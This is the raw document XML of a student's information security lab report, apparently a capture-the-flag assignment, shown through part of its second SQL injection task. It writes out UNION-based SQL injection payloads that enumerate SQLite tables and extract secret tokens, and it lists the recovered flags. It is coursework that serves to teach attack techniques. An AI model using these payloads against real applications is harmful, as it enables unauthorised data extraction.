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3B8F82" w14:textId="357B73B2" w:rsidR="00455D3B" w:rsidRPr="00CE476B" w:rsidRDefault="0035023A" w:rsidP="0035023A">
      <w:pPr>
        <w:pStyle w:val="Title"/>
        <w:rPr>
          <w:bCs/>
          <w:sz w:val="72"/>
          <w:szCs w:val="72"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE476B">
        <w:rPr>
          <w:bCs/>
          <w:sz w:val="72"/>
          <w:szCs w:val="72"/>
        </w:rPr>
        <w:t xml:space="preserve">Information Security A-03 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12A0CBEF" w14:textId="7DB54468" w:rsidR="0035023A" w:rsidRPr="00CE476B" w:rsidRDefault="0035023A">
      <w:pPr>
        <w:rPr>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE476B">
        <w:rPr>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Tauha Imran 22i-1239 cs-g</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D9F0DEA" w14:textId="77777777" w:rsidR="0035023A" w:rsidRPr="00CE476B" w:rsidRDefault="0035023A">
      <w:pPr>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sdt>
      <w:sdtPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:kern w:val="2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w14:ligatures w14:val="standardContextual"/>
        </w:rPr>
        <w:id w:val="91498189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2B06415" w14:textId="65F5BFC2" w:rsidR="0035023A" w:rsidRPr="00CE476B" w:rsidRDefault="0035023A">
          <w:pPr>
            <w:pStyle w:val="TOCHeading"/>
            <w:rPr>
              <w:bCs/>
            </w:rPr>
          </w:pPr>
          <w:r w:rsidRPr="00CE476B">
            <w:rPr>
              <w:bCs/>
            </w:rPr>
            <w:t>Table of Contents</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="09C314F5" w14:textId="10FD35F1" w:rsidR="00FE69C9" w:rsidRDefault="003502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CE476B">
            <w:rPr>
              <w:bCs/>
            </w:rPr>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidRPr="00CE476B">
            <w:rPr>
              <w:bCs/>
            </w:rPr>
            <w:instrText xml:space="preserve"> TOC \o "1-3" \h \z \u </w:instrText>
          </w:r>
          <w:r w:rsidRPr="00CE476B">
            <w:rPr>
              <w:bCs/>
            </w:rPr>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:hyperlink w:anchor="_Toc215147288" w:history="1">
            <w:r w:rsidR="00FE69C9" w:rsidRPr="002C26B9">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:bCs/>
                <w:noProof/>
              </w:rPr>
              <w:t>01 SQL Injection – Basic</w:t>
            </w:r>
            <w:r w:rsidR="00FE69C9">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00FE69C9">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00FE69C9">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc215147288 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00FE69C9">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00FE69C9">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00FE69C9">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
            <w:r w:rsidR="00FE69C9">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1C07B1A1" w14:textId="0ECD708D" w:rsidR="00FE69C9" w:rsidRDefault="00FE69C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5147289" w:history="1">
            <w:r w:rsidRPr="002C26B9">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:bCs/>
                <w:noProof/>
              </w:rPr>
              <w:t>02 SQL Injection – Advance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_Toc215147289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630EC" w14:textId="58CC62D8" w:rsidR="00FE69C9" w:rsidRDefault="00FE69C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5147290" w:history="1">
            <w:r w:rsidRPr="002C26B9">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:bCs/>
                <w:noProof/>
              </w:rPr>
              <w:t>03 SQLi blind - It's a blind SQL.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_Toc215147290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FB9DB" w14:textId="6AB77D3B" w:rsidR="00FE69C9" w:rsidRDefault="00FE69C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5147291" w:history="1">
            <w:r w:rsidRPr="002C26B9">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:bCs/>
                <w:noProof/>
              </w:rPr>
              <w:t>04 Cross-Site Scripting (XSS)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_Toc215147291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9E499" w14:textId="3469BE1D" w:rsidR="00FE69C9" w:rsidRDefault="00FE69C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5147292" w:history="1">
            <w:r w:rsidRPr="002C26B9">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>05 CSRF Task – Cross-Site Request Forgery (CSRF)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_Toc215147292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3737C" w14:textId="744CB7FF" w:rsidR="00FE69C9" w:rsidRDefault="00FE69C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5147293" w:history="1">
            <w:r w:rsidRPr="002C26B9">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>06 Bonus Task – STEG (Stenography)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_Toc215147293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C4B13" w14:textId="164234D7" w:rsidR="0035023A" w:rsidRPr="00CE476B" w:rsidRDefault="0035023A">
          <w:pPr>
            <w:rPr>
              <w:bCs/>
            </w:rPr>
          </w:pPr>
          <w:r w:rsidRPr="00CE476B">
            <w:rPr>
              <w:bCs/>
              <w:noProof/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:p>
      </w:sdtContent>
    </w:sdt>
    <w:p w14:paraId="5E183C96" w14:textId="104C91EC" w:rsidR="0035023A" w:rsidRPr="00CE476B" w:rsidRDefault="0035023A">
      <w:pPr>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE476B">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="6486D390" w14:textId="77777777" w:rsidR="0035023A" w:rsidRPr="00CE476B" w:rsidRDefault="0035023A">
      <w:pPr>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1490CFC3" w14:textId="3200D6AD" w:rsidR="00637DCA" w:rsidRDefault="0035023A" w:rsidP="0035023A">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_Toc215147288"/>
      <w:r w:rsidRPr="00CE476B">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">01 SQL Injection </w:t>
      </w:r>
      <w:r w:rsidR="00637DCA">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>–</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE476B">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Basic</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w14:paraId="68AD0839" w14:textId="06CA28ED" w:rsidR="0035023A" w:rsidRPr="00CE476B" w:rsidRDefault="0035023A" w:rsidP="00637DCA">
      <w:r w:rsidRPr="00CE476B">
        <w:t xml:space="preserve"> Exploit a basic SQL Query</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C8EADC3" w14:textId="77777777" w:rsidR="0035023A" w:rsidRPr="00CE476B" w:rsidRDefault="0035023A">
      <w:pPr>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="34B8319B" w14:textId="603453FF" w:rsidR="00455D3B" w:rsidRPr="00CE476B" w:rsidRDefault="00455D3B">
      <w:pPr>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE476B">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Testing basic </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00CE476B">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>query ,</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00CE476B">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> got basic table and user information</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B06C783" w14:textId="2B088AD9" w:rsidR="0035023A" w:rsidRPr="00CE476B" w:rsidRDefault="0035023A">
      <w:pPr>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE476B">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>query: %</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F6A1A55" w14:textId="77777777" w:rsidR="0063785B" w:rsidRPr="00CE476B" w:rsidRDefault="00455D3B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39909861" wp14:editId="62ED5F25">
            <wp:extent cx="5411349" cy="3040083"/>
            <wp:effectExtent l="0" t="0" r="0" b="8255"/>
            <wp:docPr id="81299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423" cy="305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54538" w14:textId="6E3FC63A" w:rsidR="0063785B" w:rsidRPr="00CE476B" w:rsidRDefault="00C93184">
      <w:pPr>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE476B">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>q</w:t>
      </w:r>
      <w:r w:rsidR="0063785B" w:rsidRPr="00CE476B">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>uery: %' UNION SELECT 1,2,3--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22F57B43" w14:textId="2B4A6731" w:rsidR="0063785B" w:rsidRPr="00CE476B" w:rsidRDefault="0063785B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60659F1C" wp14:editId="33947F88">
            <wp:extent cx="5403273" cy="3035547"/>
            <wp:effectExtent l="0" t="0" r="6985" b="0"/>
            <wp:docPr id="199828195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81954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683" cy="304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4CF28" w14:textId="5BDD9D93" w:rsidR="0063785B" w:rsidRPr="00CE476B" w:rsidRDefault="0063785B">
      <w:pPr>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2C700691" w14:textId="431D5E41" w:rsidR="00455D3B" w:rsidRPr="00CE476B" w:rsidRDefault="00455D3B">
      <w:pPr>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="47B6C28C" w14:textId="77777777" w:rsidR="00455D3B" w:rsidRPr="00CE476B" w:rsidRDefault="00455D3B">
      <w:pPr>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE476B">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>This way I can tell that this is injectable because results are showing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73ED0E5B" w14:textId="77777777" w:rsidR="00455D3B" w:rsidRPr="00CE476B" w:rsidRDefault="00455D3B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555736AB" wp14:editId="30E03003">
            <wp:extent cx="5284519" cy="2968831"/>
            <wp:effectExtent l="0" t="0" r="0" b="3175"/>
            <wp:docPr id="18821544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639" cy="297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D61F8" w14:textId="77777777" w:rsidR="00455D3B" w:rsidRPr="00CE476B" w:rsidRDefault="00455D3B">
      <w:pPr>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6F2B0640" w14:textId="164DF816" w:rsidR="00455D3B" w:rsidRPr="00CE476B" w:rsidRDefault="00455D3B">
      <w:pPr>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE476B">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Getting all the table names to find the flag</w:t>
      </w:r>
      <w:r w:rsidR="00D71DC9" w:rsidRPr="00CE476B">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:br/>
        <w:t>q</w:t>
      </w:r>
      <w:r w:rsidR="00A5156B" w:rsidRPr="00CE476B">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">uery: </w:t>
      </w:r>
      <w:r w:rsidR="00587E9F" w:rsidRPr="00CE476B">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>%’</w:t>
      </w:r>
      <w:r w:rsidR="00A5156B" w:rsidRPr="00CE476B">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> UNION SELECT name,1,1 FROM </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00A5156B" w:rsidRPr="00CE476B">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>sqlite_master</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00A5156B" w:rsidRPr="00CE476B">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> WHERE type='table' --</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE476B">
        <w:rPr>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="128E2D00" wp14:editId="50173EFA">
            <wp:extent cx="5260769" cy="2955488"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="11108941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185" cy="296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6DF18" w14:textId="769FCB34" w:rsidR="00FE1B27" w:rsidRPr="00CE476B" w:rsidRDefault="00FE1B27">
      <w:pPr>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE476B">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">And I found </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00CE476B">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>a ”</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CE476B">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>player</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00CE476B">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>_secrets</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CE476B">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>” table</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D911683" w14:textId="654E63D4" w:rsidR="00FE1B27" w:rsidRPr="00CE476B" w:rsidRDefault="00FE1B27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0B58A0B9" wp14:editId="64316A2F">
            <wp:extent cx="5943600" cy="1235710"/>
            <wp:effectExtent l="0" t="0" r="0" b="2540"/>
            <wp:docPr id="14631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68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8431" w14:textId="77777777" w:rsidR="002B23A0" w:rsidRPr="00CE476B" w:rsidRDefault="002B23A0">
      <w:pPr>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="55656DA4" w14:textId="45C75A94" w:rsidR="002B23A0" w:rsidRPr="00CE476B" w:rsidRDefault="002B23A0">
      <w:pPr>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE476B">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>Getting data from that “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CE476B">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>player_secrets</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CE476B">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>” table</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE476B">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">query: </w:t>
      </w:r>
      <w:r w:rsidR="00BF6FA1" w:rsidRPr="00CE476B">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">%'UNION SELECT </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00BF6FA1" w:rsidRPr="00CE476B">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>secret_token</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00BF6FA1" w:rsidRPr="00CE476B">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00BF6FA1" w:rsidRPr="00CE476B">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>reward_points</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00BF6FA1" w:rsidRPr="00CE476B">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">, 0 FROM </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00BF6FA1" w:rsidRPr="00CE476B">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>player_secrets</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="006A49F4" w:rsidRPr="00CE476B">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>—</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69353865" w14:textId="6D3B489F" w:rsidR="006A49F4" w:rsidRPr="00CE476B" w:rsidRDefault="006A49F4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289DBC68" wp14:editId="0227579A">
            <wp:extent cx="5943600" cy="3341370"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="74542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291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76B">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>Found the flags now submitting and seeing which one works!</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="9037" w:type="dxa"/>
        <w:shd w:val="clear" w:color="auto" w:fill="0F172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97"/>
        <w:gridCol w:w="1840"/>
      </w:tblGrid>
      <w:tr w:rsidR="006A49F4" w:rsidRPr="00CE476B" w14:paraId="23BF79ED" w14:textId="77777777" w:rsidTr="006A49F4">
        <w:trPr>
          <w:trHeight w:val="763"/>
        </w:trPr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61A4279E" w14:textId="72893769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Flags Found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7190BBD3" w14:textId="78B4369E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Correct?</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006A49F4" w:rsidRPr="00CE476B" w14:paraId="10E7501D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</w:tcPr>
          <w:p w14:paraId="67402CB3" w14:textId="423B77CA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</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00CE476B">
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>This_is_not_the_flag</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00CE476B">
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>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</w:tcPr>
          <w:p w14:paraId="23FFB8AE" w14:textId="6563AD84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6A49F4" w:rsidRPr="00CE476B" w14:paraId="2118C2B7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03B5387E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FLAG{Trust_me_its_false_1}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5A44E083" w14:textId="78753C80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6A49F4" w:rsidRPr="00CE476B" w14:paraId="03CA993E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4DF29B61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FLAG{Trust_me_its_ture_1}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6F3FBB37" w14:textId="5527E6E3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6A49F4" w:rsidRPr="00CE476B" w14:paraId="694F8F3E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0E658ECE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FLAG{Trust_me_its_false_2}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69243FE9" w14:textId="5491C7DE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6A49F4" w:rsidRPr="00CE476B" w14:paraId="753468B6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2C373509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</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00CE476B">
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>Hello_world_to_SQLi</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00CE476B">
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>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5CFA693E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999</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006A49F4" w:rsidRPr="00CE476B" w14:paraId="18B39259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76A1F2BE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FLAG{Trust_me_its_ture_2}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3DEA6121" w14:textId="493167A2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YESSS</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2CDD5865" w14:textId="77777777" w:rsidR="006A49F4" w:rsidRPr="00CE476B" w:rsidRDefault="006A49F4">
      <w:pPr>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="460A8206" w14:textId="4A9361FD" w:rsidR="006A49F4" w:rsidRPr="00CE476B" w:rsidRDefault="006A49F4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1323071F" wp14:editId="15C4DDCE">
            <wp:extent cx="5943600" cy="3341370"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="22061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134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4BD8" w14:textId="77777777" w:rsidR="005C338D" w:rsidRPr="00CE476B" w:rsidRDefault="005C338D">
      <w:pPr>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="63005493" w14:textId="1EB97308" w:rsidR="005C338D" w:rsidRPr="00CE476B" w:rsidRDefault="005C338D">
      <w:pPr>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE476B">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B8840AE" w14:textId="2055F49B" w:rsidR="00637DCA" w:rsidRDefault="005C338D" w:rsidP="00C3324B">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1" w:name="_Toc215147289"/>
      <w:r w:rsidRPr="00CE476B">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidR="00C3324B" w:rsidRPr="00CE476B">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE476B">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> SQL Injection – Advance </w:t>
      </w:r>
      <w:r w:rsidR="00637DCA">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>–</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1"/>
      <w:r w:rsidRPr="00CE476B">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5701EC6F" w14:textId="25262735" w:rsidR="005C338D" w:rsidRPr="00CE476B" w:rsidRDefault="00C3324B" w:rsidP="00637DCA">
      <w:r w:rsidRPr="00CE476B">
        <w:t>Exploit a bit advanced SQL Query</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FEA3F77" w14:textId="3BE376EB" w:rsidR="00C3324B" w:rsidRPr="00CE476B" w:rsidRDefault="00C3324B" w:rsidP="00C3324B">
      <w:pPr>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="383E9BF5" w14:textId="7341CD1A" w:rsidR="00C3324B" w:rsidRPr="00CE476B" w:rsidRDefault="00C3324B" w:rsidP="00C3324B">
      <w:pPr>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE476B">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Starting </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CE476B">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>of</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CE476B">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> with a basic query to see what we can find</w:t>
      </w:r>
      <w:r w:rsidR="00453893" w:rsidRPr="00CE476B">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00CE476B">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>query: %</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B7EB566" w14:textId="3692C6FA" w:rsidR="005C338D" w:rsidRPr="00CE476B" w:rsidRDefault="00453893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37E83EBC" wp14:editId="63BB8AEF">
            <wp:extent cx="5197642" cy="2926450"/>
            <wp:effectExtent l="0" t="0" r="3175" b="7620"/>
            <wp:docPr id="114590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027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285" cy="292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565D" w14:textId="77777777" w:rsidR="00453893" w:rsidRPr="00CE476B" w:rsidRDefault="00453893">
      <w:pPr>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="34F9DBEC" w14:textId="4BE32557" w:rsidR="00C3324B" w:rsidRPr="00CE476B" w:rsidRDefault="00C3324B">
      <w:pPr>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE476B">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>now further exploring the columns</w:t>
      </w:r>
      <w:r w:rsidR="00453893" w:rsidRPr="00CE476B">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00CE476B">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>query: %' UNION SELECT 'a','b',1,'c' ORDER by budget --</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14CF7548" w14:textId="155360FD" w:rsidR="00C3324B" w:rsidRPr="00CE476B" w:rsidRDefault="00C3324B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3ABC84BB" wp14:editId="51611172">
            <wp:extent cx="5094514" cy="2864030"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="85372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217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9978" cy="287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141B" w14:textId="382EB918" w:rsidR="00E06A21" w:rsidRPr="00CE476B" w:rsidRDefault="00E06A21">
      <w:pPr>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE476B">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>Now getting the table names</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE476B">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">query:  %' UNION SELECT name, 'x', 1, 'x' FROM </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CE476B">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>sqlite_master</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CE476B">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B22E4E" w:rsidRPr="00CE476B">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>–</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37BC4D07" w14:textId="18393CC2" w:rsidR="00B22E4E" w:rsidRPr="00CE476B" w:rsidRDefault="00B22E4E">
      <w:pPr>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE476B">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>Found a table named “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CE476B">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>client_vault</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00CE476B">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>” ,</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00CE476B">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> I think</w:t>
      </w:r>
      <w:r w:rsidR="009A3845" w:rsidRPr="00CE476B">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> the flag</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE476B">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> might be there </w:t>
      </w:r>
    </w:p>
